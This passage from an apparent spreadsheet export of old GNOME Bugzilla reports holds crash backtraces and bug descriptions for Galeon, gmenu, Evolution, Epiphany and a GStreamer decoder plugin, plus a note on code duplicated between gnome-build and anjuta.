#7  0x08078206 in cmd_paste_cut () at eval.c:41
41	in eval.c
ap = (void **) 0x8389058
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8388f58 \003
result = 137924696
result = 137924440
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-07-02 18:23 -------
The original reporter (edmund@roland.org) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>edmund</t>
  </si>
  <si>
    <t>GALEON-55411</t>
  </si>
  <si>
    <t>Crash on condext menu download.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: 0.10.6
Synopsis: Crash on condext menu download.
Bugzilla-Product: galeon
Bugzilla-Component: general
Description:
I rightclicked on a url to www.linux.com and selected the dowload file (I dont know if that's the correct label I use the swedish translation). That's it... crash.
Debugging Information:
[New Thread 1024 (LWP 30357)]
[New Thread 2049 (LWP 30347)]
0x4087eec9 in wait4 () from /lib/libc.so.6
#0  0x4087eec9 in wait4 () from /lib/libc.so.6
#1  0x408e8e4c in __check_rhosts_file () from /lib/libc.so.6
#2  0x4071e173 in waitpid () from /lib/libpthread.so.0
#3  0x401ad6e8 in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4071bdd4 in pthread_sighandler () from /lib/libpthread.so.0
#5  0x40808a18 in sigaction () from /lib/libc.so.6
#6  0x807eded in save_url_with_command_line (
    url=0x4184eed0 http://www.linux.com/) at misc.c:544
#7  0x807ed7d in save_url (url=0x4184eed0 http://www.linux.com/)
    at misc.c:520
#8  0x8072c6b in context_do_action (action=GALEON_CONTEXT_DOWNLOAD 
    info=0x4184f2d0 embed=0x8195728) at context.c:425
#9  0x8072e3a in context_show_menu (embed=0x8195728 info=0x4184f2d0)
    at context.c:508
#10 0x8082ada in mozembed_dom_mouse_click_cb (dummy=0x40d65758 
    dom_event=0x4184ec7c embed=0x8195728) at mozcallbacks.c:599
#11 0x402f62a3 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#12 0x4032608c in gtk_signal_remove_emission_hook ()
   from /usr/lib/libgtk-1.2.so.0
#13 0x403254f5 in gtk_signal_set_funcs () from /usr/lib/libgtk-1.2.so.0
#14 0x403235d3 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#15 0x4002546c in EmbedEventListener::MouseClick ()
   from /opt/mozilla/0.9cvs/libgtkembedmoz.so
#16 0x40eb9979 in nsEventListenerManager::HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#17 0x412912d9 in nsWindowRoot::HandleChromeEvent ()
   from /opt/mozilla/0.9cvs/components/libjsdom.so
#18 0x4127c5ec in GlobalWindowImpl::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libjsdom.so
#19 0x40ffca84 in nsDocument::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#20 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#21 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#22 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#23 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#24 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#25 0x41018063 in nsGenericElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#26 0x40ece4dc in nsGenericHTMLElement::HandleDOMEventForAnchors ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#27 0x40ed7111 in nsHTMLAnchorElement::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#28 0x41013558 in nsGenericDOMDataNode::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#29 0x4103c59b in nsTextNode::HandleDOMEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#30 0x416274b7 in PresShell::HandleEventInternal ()
   from /opt/mozilla/0.9cvs/components/libgklayout.so
#31 0x416273c0 in PresShell::HandleEventWithTarget ()
   from /opt/mozilla/0.9cvs/components/libgklayout.so
#32 0x40ec13f9 in nsEventStateManager::CheckForAndDispatchClick ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#33 0x40ebfbec in nsEventStateManager::PostHandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkcontent.so
#34 0x4162758e in PresShell::HandleEventInternal ()
   from /opt/mozilla/0.9cvs/components/libgklayout.so
#35 0x41627343 in PresShell::HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgklayout.so
#36 0x4175f806 in nsView::HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkview.so
#37 0x4175f7ae in nsView::HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkview.so
#38 0x4175f7ae in nsView::HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkview.so
#39 0x41768ede in nsViewManager::DispatchEvent ()
   from /opt/mozilla/0.9cvs/components/libgkview.so
#40 0x4175f1ad in HandleEvent ()
   from /opt/mozilla/0.9cvs/components/libgkview.so
#41 0x4114ed6a in nsWidget::DispatchEvent ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#42 0x4114ec95 in nsWidget::DispatchWindowEvent ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#43 0x4114edf0 in nsWidget::DispatchMouseEvent ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#44 0x4114fa6f in nsWidget::OnButtonReleaseSignal ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#45 0x41152e6f in nsWindow::HandleGDKEvent ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#46 0x41149e07 in dispatch_superwin_event ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#47 0x41149b5c in handle_gdk_event ()
   from /opt/mozilla/0.9cvs/components/libwidget_gtk.so
#48 0x403b0507 in gdk_wm_protocols_filter () from /usr/lib/libgdk-1.2.so.0
#49 0x405bb309 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#50 0x405bb913 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#51 0x405bbaac in g_main_run () from /usr/lib/libglib-1.2.so.0
#52 0x402f4c57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#53 0x807c86a in main (argc=1 argv=0xbffffaac) at main.c:297
#54 0x407f92eb in __libc_start_main () from /lib/libc.so.6
#0  0x4087eec9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x408e8e4c in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4071e173 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x401ad6e8 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x4071bdd4 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40808a18 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x807eded in save_url_with_command_line (
    url=0x4184eed0 http://www.linux.com/) at misc.c:544
544	
argv = (gchar **) 0xfffffe00
url = (gchar *) 0x0
dir = (gchar *) 0x0
command = (gchar *) 0x0
full_command = (gchar *) 0x0
pid = -512
#7  0x807ed7d in save_url (url=0x4184eed0 http://www.linux.com/)
    at misc.c:520
520	save_url (const gchar* url)
url = (gchar *) 0x4184eed0 http://www.linux.com/
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-29 05:40 -------
The original reporter (snaggen@skinner.codefactory.se) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component matt@ookypooky.com.
</t>
  </si>
  <si>
    <t>GNOME-CORE-28105</t>
  </si>
  <si>
    <t>gmenu crashes when I click on a menu item  i want to change.</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: grave
Version:  1.2.2.1
Synopsis: gmenu crashes when I click on a menu item  i want to change.
Class:    sw-bug
Distribution: Debian woody
System: Linux 2.4.0-test8 i586 unknown
C library: C library 2.1.94-3
C compiler: 2.95.2
glib: 1.2.8
GTK+: GTK+ 1.2.8-helix2
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4-helix4
libxml: 1.8.10
gnome-print: gnome-print 
gnome-core: gnome-core 1.2.2.1-helix2
Description:
I just open up gmenu on my debian woody system. I'm running linux 
kernel 2.4.0-test8 with XFree86 4.0.1.
If I click on any one of the menu items it seg faults on me.
Debugging information:
(no debugging symbols found)...#0  0x404d47a9 in ?? ()
#1  0x4008c3d8 in ?? ()
#2  
#3  0x404a6873 in ?? ()
#4  0x804cec9 in edit_area_set_to ()
#5  0x804f0c3 in menu_tree_populate ()
#6  0x401d9d6f in ?? ()
#7  0x4020868c in ?? ()
#8  0x40207af5 in ?? ()
#9  0x40205bd3 in ?? ()
#10 0x4019eafc in ?? ()
#11 0x401d9d19 in ?? ()
#12 0x4020798f in ?? ()
#13 0x40205bd3 in ?? ()
#14 0x401899b8 in ?? ()
#15 0x4019a2cd in ?? ()
#16 0x401d99cb in ?? ()
#17 0x40207b33 in ?? ()
#18 0x40205bd3 in ?? ()
#19 0x4023bfeb in ?? ()
#20 0x401d9935 in ?? ()
#21 0x401d8b5e in ?? ()
#22 0x40287027 in ?? ()
#23 0x4041e2b9 in ?? ()
#24 0x4041e8c3 in ?? ()
#25 0x4041ea5c in ?? ()
#26 0x401d8457 in ?? ()
#27 0x804d885 in main ()
#28 0x4044fb8c in ?? ()
#0  0x404d47a9 in ?? ()
No symbol table info available.
#1  0x4008c3d8 in ?? ()
No symbol table info available.
#2  
No symbol table info available.
#3  0x404a6873 in ?? ()
No symbol table info available.
#4  0x804cec9 in edit_area_set_to ()
No symbol table info available.
#5  0x804f0c3 in menu_tree_populate ()
No symbol table info available.
#6  0x401d9d6f in ?? ()
No symbol table info available.
#7  0x4020868c in ?? ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:06 -------
This bug was previously known as bug 28105 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=28105
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (djw@flinthills.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-BUILD-425874</t>
  </si>
  <si>
    <t>Duplicated functions in gnome-build and anjuta</t>
  </si>
  <si>
    <t>Please describe the problem:
Request for bug #425850.
Compared gnome-build and anjuta codes found there are duplicated codes in
these two module.
gnome-build/src/gbf/glue-factory.[c|h]  anjuta/libanjuta/glue-factory.[c|h]
gnome-build/src/gbf/glue-plugin.[c|h]  anjuta/libanjuta/glue-plugin.[c|h]
Need remove them from anjuta and apply some little difference in gnome-build.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-383861</t>
  </si>
  <si>
    <t>SuSE 10.2: Evolution 2.8.2 does not remember passwords</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Evolution 2.8.2 will not hold the password.
Distribution: openSUSE 10.2 (i586)
Gnome Release: 2.16.1 2006-11-28 (SUSE)
BugBuddy Version: 2.16.0</t>
  </si>
  <si>
    <t>alasris</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-240791</t>
  </si>
  <si>
    <t>Intermittent connector crash on start up</t>
  </si>
  <si>
    <t>#0  0x412424d9 in wait4 () from /lib/libc.so.6
#1  0x412ba30c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4007283a in waitpid () from /lib/libpthread.so.0
#3  0x40935cd5 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:646
#4  0x40070307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x40802eba in authorize_handler (msg=0x812ecf0 proxy=0)
    at soup-message.c:707
#7  0x40803313 in soup_message_run_handlers (msg=0x812ecf0
    invoke_type=SOUP_HANDLER_PRE_BODY) at soup-message.c:942
#8  0x40806953 in soup_queue_read_headers_cb (headers=0xbfffd630
    encoding=0x8131648 content_len=0x813164c user_data=0x812ecf0)
    at soup-queue.c:215
#9  0x4080bfc1 in soup_transfer_read_cb (iochannel=0x8130d80
    condition=G_IO_IN r=0x8131628) at soup-transfer.c:475
#10 0x4111c7b3 in g_vsnprintf () from /usr/lib/libglib-2.0.so.0
#11 0x410feab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#12 0x410ff8cd in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#13 0x410ffc60 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#14 0x41100306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#15 0x40f918fe in bonobo_main () from /usr/lib/libbonobo-2.so.0
#16 0x0806f338 in main (argc=3 argv=0xbffff864) at main.c:515
#17 0x411af1c4 in __libc_start_main () from /lib/libc.so.6
(gdb) p *msg
$3 = {priv = 0x812d478 context = 0x812ed38 connection = 0x8130b88
  method = 0x80ae770 GET status = SOUP_STATUS_READING_RESPONSE
  errorcode = 401 errorclass = SOUP_ERROR_CLASS_CLIENT_ERROR
  errorphrase = 0x8131600 Access Denied request = {
    owner = SOUP_BUFFER_SYSTEM_OWNED body = 0x0 length = 0}
  request_headers = 0x812ec80 response = {owner = SOUP_BUFFER_SYSTEM_OWNED
    body = 0x0 length = 0} response_headers = 0x812eca0}
(gdb) p *msg-&gt;connection
$4 = {server = 0x2c697246 context = 0x20343020 channel = 0x20727041
  socket = 0x33303032 auth = 0x3a303220 port = 825897267
  in_use = 1296506932 last_used_id = 84 keep_alive = 0 death_tag = 18}
The connection info seems to be hosed.</t>
  </si>
  <si>
    <t>GSTREAMER-350723</t>
  </si>
  <si>
    <t>[mad] Wrong output buffer timestamping</t>
  </si>
  <si>
    <t>This may be the cause bug 349719 but I am not sure about this so I am opening a new bug.
This bug was resolved and fixed by Martin Zlomek (martin.zlomek@itonis.tv)
There is a bug in mad plugin caused by curious behaviour of libmad.
The plugin joins incoming buffers to a temporary  
buffer in its _chain function.
When an incoming buffer has a valid timestamp (input timestamp) the  
plugin uses it for timestamping of the outgoing buffer (output timestamp)  
otherwise interpolates the output timestamp from the previous input  
timestamp and the number of samples decoded.
The activation of the new input timestamp is postponed if any data remains  
in the temporary buffer from the previous iteration of the chain function.
The libmad decodes the data frame after frame. There is a check in the  
libmad call if the input buffer (i.e. the temporary buffer) has enough  
data. If the input buffer has not required amount of data libmad call  
fails and the chain function returns to gather more data in the next  
iteration.
The libmad call requires frame_size + MAD_BUFFER_GUARD bytes of input data.
The problem occurs when the input buffer has just between frame_size and  
frame_size + MAD_BUFFER_GUARD bytes.
In the next interation of the chain function if the incoming buffer has a  
valid timestamp then this timestamp is used just after decoding of the first frame (frame_size bytes) from the temporary buffer. This causes the timestamp  
hole. The input timestamp is activated too early because there is another  
frame which begins in the previous iteration (it has &lt; MAD_BUFFER_GUARD  
bytes from the prev. iter.) and should have output timestamp  
interpolated still from the previous input timestamp.
On the other hand because of the hole there are duplicated timestamps a  
few frames later.
Included patch fixes this bug - it waits with the activation untill the  
second frame is decoded. It also fixes dropping of the exactly first frame  
of the whole decoding when the plugin is detecting MP3 (see the block  
containing mpg123_parse_xing_header()).</t>
  </si>
  <si>
    <t>EVOLUTION-215439</t>
  </si>
  <si>
    <t>Composer in Evolution doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.99.0
Synopsis: Composer in Evolution doesn't work
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Click on New Message or Reply get message: Could not create composer
window: Unable to activate HTML editor component.
The error from the activation system is: Nothing matched the
requirements.
Using Mandrake 8.0
Receiving mail via IMAP from MS Exchange box.
Unknown reporter: rsimmons@ccsinet.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>rsimmons</t>
  </si>
  <si>
    <t>EPIPHANY-335308</t>
  </si>
  <si>
    <t>Epiphany crash when closing a window</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Gentoo Base System version 1.6.14
Package: epiphany
Severity: Normal
Version: GNOME2.14.0 2.14.0
Gnome-Distributor: Gentoo
Synopsis: Epiphany crash when closing a window
Bugzilla-Product: epiphany
Bugzilla-Component: General
Bugzilla-Version: 2.14.0
BugBuddy-GnomeVersion: 2.0 (2.14.0)
Description:
Description of the crash:
 The browser crashed when I pressed the close button on one of the
opened window
Steps to reproduce the crash:
1. Run epiphany
2. Close one of the window
3. 
Expected Results:
 Nothing special.
How often does this happen?
 Sometimes.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/epiphany'
Using host libthread_db library /lib/tls/libthread_db.so.1.
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.
[Thread debugging using libthread_db enabled]
[New Thread -1230358848 (LWP 7590)]
[New Thread -1330947152 (LWP 7703)]
[New Thread -1301746768 (LWP 7702)]
[New Thread -1293354064 (LWP 7701)]
[New Thread -1318532176 (LWP 7700)]
[New Thread -1276175440 (LWP 7595)]
[New Thread -1249723472 (LWP 7594)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb6d823cb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0xb7d6df70 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:784
#3  
#4  0x000000ff in ?? ()
#5  0xb6d49dea in g_object_unref () from /usr/lib/libgobject-2.0.so.0
#6  0xb6d4aae9 in g_object_get_valist () from
/usr/lib/libgobject-2.0.so.0
#7  0xb6d4ab9f in g_object_get () from /usr/lib/libgobject-2.0.so.0
#8  0xb7f9c1f6 in update_statusbar ()
   from /usr/lib/epiphany/2.14/extensions/libadblockextension.so
#9  0xb73d38fa in _gtk_marshal_VOID__POINTER_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#10 0xb6d46a49 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#11 0xb6d583bd in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#12 0x00000000 in ?? ()
Thread 7 (Thread -1249723472 (LWP 7594)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6c4aed2 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb7e9d63c in _pr_poll_with_poll (pds=0x82d4b68 npds=1 
    timeout=4294967295) at ptio.c:3877
	me = (PRThread *) 0xffffffff
	stack_syspoll = {{fd = 19 events = 1 revents = 0} {
    fd = -1249726008 events = -2123 revents = -18729} {fd =
-1209355140 
    events = -23920 revents = -20288} {fd = -1329533912 events =
-23696 
    revents = -20288} {fd = -1329548208 events = 1 revents = 0} {
    fd = -1329547640 events = -28835 revents = -18456} {fd =
-1329552732 
    events = -31468 revents = -18831} {fd = -1249725960 events =
23456 
    revents = -18742} {fd = 24 events = 19168 revents = -20288} {
    fd = -1329575280 events = 23492 revents = -18742} {fd =
-1228210188 
    events = 16 revents = -20288} {fd = 162096040 events = 6176 
    revents = -18741} {fd = -1228210188 events = 6176 revents =
-18741} {
    fd = 162096040 events = 23492 revents = -18742} {fd =
-1228935927 
    events = 6176 revents = -18741} {fd = -1329587808 events = 23492
    revents = -18742} {fd = -1228210188 events = 16 revents =
-20288} {
    fd = -1329554248 events = 16 revents = -20288} {fd = -1228210188
    events = 16 revents = -20288} {fd = -1329554248 events = -19880
    revents = -19070} {fd = -1228935927 events = 16 revents =
-20288} {
    fd = -1329554248 events = 3228 revents = -18439} {fd =
-1329554248 
    events = 4732 revents = 2206} {fd = -1249725848 events = -6879 
    revents = -18442} {fd = -1329554248 events = 21220 revents =
-18759} {
    fd = -1249725816 events = 23182 revents = -18766} {fd =
-1329554248 
    events = 16388 revents = -32768} {fd = 1 events = 20050 
    revents = -18766} {fd = -1229368604 events = 4972 revents =
2206} {
    fd = -1249725800 events = 18461 revents = -18766} {fd =
-1329554248 
    events = -9080 revents = 31487} {fd = -1249725768 events =
-27229 
    revents = -18767} {fd = 144577148 events = 4972 revents = 2206}
{
    fd = 144577104 events = -5379 revents = -18835} {fd = 144577388
    events = 2 revents = 0} {fd = -1249725704 events = -26342 
    revents = -18767} {fd = 144577148 events = -8601 revents =
-18729} {
    fd = 2 events = -19696 revents = -19070} {fd = -1329571320 
    events = -8601 revents = -18729} {fd = 1 events = -280 
    revents = 2074} {fd = -1249725720 events = -7616 revents =
-18729} {
    fd = -1249725688 events = 23492 revents = -18742} {fd =
135986920 
    events = -17488 revents = -19070} {fd = 161316008 events = 6176
    revents = -18741} {fd = -1228210188 events = 6176 revents =
-18741} {
    fd = 161316008 events = 23492 revents = -18742} {fd =
-1228935927 
    events = 6176 revents = -18741} {fd = -1329533912 events = 16 
    revents = -20288} {fd = -1228210188 events = 16 revents =
-20288} {
    fd = -1329555688 events = -19640 revents = -19070} {fd =
-1228935927 
    events = 16 revents = -20288} {fd = -1329555688 events = 23456 
    revents = -18742} {fd = 32 events = 22912 revents = -20288} {
    fd = -1329571752 events = 16 revents = -20288} {fd = -1228210188
    events = 16 revents = -20288} {fd = -1329571752 events = -19592
    revents = -19070} {fd = -1228935927 events = 16 revents =
-20288} {
    fd = -1329571752 events = 3228 revents = -18439} {fd =
-1329571752 
    events = 22616 revents = -20288} {fd = -1249725560 events =
-19544 
    revents = -19070} {fd = -1209355140 events = 0 revents = 0} {
    fd = -1228841082 events = 5685 revents = -18454} {fd =
-1249725544 
    events = 0 revents = 0} {fd = 1142906172 events = 9030 revents =
8}}
	syspoll = (struct pollfd *) 0xb582b1a0
	index = 1
	msecs = -1
	ready = 0
	start = 3085532410
	elapsed = 4294967292
	remaining = 4294967292
#3  0xb668ebf3 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#4  0xb668f336 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb6b65e0b in nsIThread::IsMainThread ()
   from /usr/lib/mozilla-firefox/libxpcom_core.so
No symbol table info available.
#6  0xb7e9ed56 in _pt_root (arg=0xffffffff) at ptthread.c:220
	rv = -4
	detached = 1
#7  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1276175440 (LWP 7595)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d7ebb6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7e98085 in PR_WaitCondVar (cvar=0x81b09b0 timeout=135989684)
    at ptsynch.c:405
	rv = -1209434533
	thred = (PRThread *) 0x897e9b8
#3  0xb6b67dd5 in nsIThread::IsMainThread ()
   from /usr/lib/mozilla-firefox/libxpcom_core.so
No symbol table info available.
#4  0xb6b65e0b in nsIThread::IsMainThread ()
   from /usr/lib/mozilla-firefox/libxpcom_core.so
No symbol table info available.
#5  0xb7e9ed56 in _pt_root (arg=0x81b0890) at ptthread.c:220
	rv = -4
	detached = 144577816
#6  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread -1318532176 (LWP 7700)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d7ee2c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7e976a1 in pt_TimedWait (cv=0x8b1da5c ml=0x8b203a8
timeout=60000)
    at ptsynch.c:280
	rv = 792
	now = {tv_sec = 1142906149 tv_usec = 78362}
	tmo = {tv_sec = 1142906209 tv_nsec = 78362000}
	ticks = 0
#3  0xb7e97f3d in PR_WaitCondVar (cvar=0x8b1da58 timeout=60000)
    at ptsynch.c:407
	rv = -1209434533
	thred = (PRThread *) 0x9b57c50
#4  0xb666ad73 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb7e9ed56 in _pt_root (arg=0x8b20398) at ptthread.c:220
	rv = -4
	detached = 145884024
#6  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 4 (Thread -1293354064 (LWP 7701)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d7ee2c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7e976a1 in pt_TimedWait (cv=0x8b1da5c ml=0x8b203a8
timeout=60000)
    at ptsynch.c:280
	rv = 794
	now = {tv_sec = 1142906149 tv_usec = 162221}
	tmo = {tv_sec = 1142906209 tv_nsec = 162221000}
	ticks = 0
#3  0xb7e97f3d in PR_WaitCondVar (cvar=0x8b1da58 timeout=60000)
    at ptsynch.c:407
	rv = -1209434533
	thred = (PRThread *) 0x97de330
#4  0xb666ad73 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb7e9ed56 in _pt_root (arg=0x8b20398) at ptthread.c:220
	rv = -4
	detached = 145884024
#6  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread -1301746768 (LWP 7702)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d7ee2c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7e976a1 in pt_TimedWait (cv=0x8b1da5c ml=0x8b203a8
timeout=60000)
    at ptsynch.c:280
	rv = 788
	now = {tv_sec = 1142906149 tv_usec = 42237}
	tmo = {tv_sec = 1142906209 tv_nsec = 42237000}
	ticks = 0
#3  0xb7e97f3d in PR_WaitCondVar (cvar=0x8b1da58 timeout=60000)
    at ptsynch.c:407
	rv = -1209434533
	thred = (PRThread *) 0x8b87338
#4  0xb666ad73 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb7e9ed56 in _pt_root (arg=0x8b20398) at ptthread.c:220
	rv = -4
	detached = 145884024
#6  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread -1330947152 (LWP 7703)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d7ee2c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7e976a1 in pt_TimedWait (cv=0x8b1da5c ml=0x8b203a8
timeout=60000)
    at ptsynch.c:280
	rv = 790
	now = {tv_sec = 1142906149 tv_usec = 51490}
	tmo = {tv_sec = 1142906209 tv_nsec = 51490000}
	ticks = 0
#3  0xb7e97f3d in PR_WaitCondVar (cvar=0x8b1da58 timeout=60000)
    at ptsynch.c:407
	rv = -1209434533
	thred = (PRThread *) 0x98808d8
#4  0xb666ad73 in NSGetModule ()
   from /usr/lib/mozilla-firefox/components/libnecko.so
No symbol table info available.
#5  0xb7e9ed56 in _pt_root (arg=0x8b20398) at ptthread.c:220
	rv = -4
	detached = 145884024
#6  0xb6d7c380 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#7  0xb6c53b5e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -1230358848 (LWP 7590)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6d823cb in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0xb7d6df70 in libgnomeui_segv_handle (signum=-512) at
gnome-ui-init.c:784
	estatus = -1227631296
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {0 159202240 3067336592 550 135647776
3067081515 
      3067532936 135639148 1 3213683944 3067387342 159581028 5 4
0 
      0 3213684256 3067387291 3067532936 3213684256 3213684256 
      3213683960 3067395002 159581024 1 3213683992 3067499420 
      3213684256 0 3067443814 3067532936 3213684296}} sa_flags = 1
  sa_restorer = 0xbf8cef78}
	pid = 0
#3  
No symbol table info available.
#4  0x000000ff in ?? ()
No symbol table info available.
#5  0xb6d49dea in g_object_unref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0xb6d4aae9 in g_object_get_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0xb6d4ab9f in g_object_get () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0xb7f9c1f6 in update_statusbar ()
   from /usr/lib/epiphany/2.14/extensions/libadblockextension.so
No symbol table info available.
#9  0xb73d38fa in _gtk_marshal_VOID__POINTER_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#10 0xb6d46a49 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0xb6d583bd in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x00000000 in ?? ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()
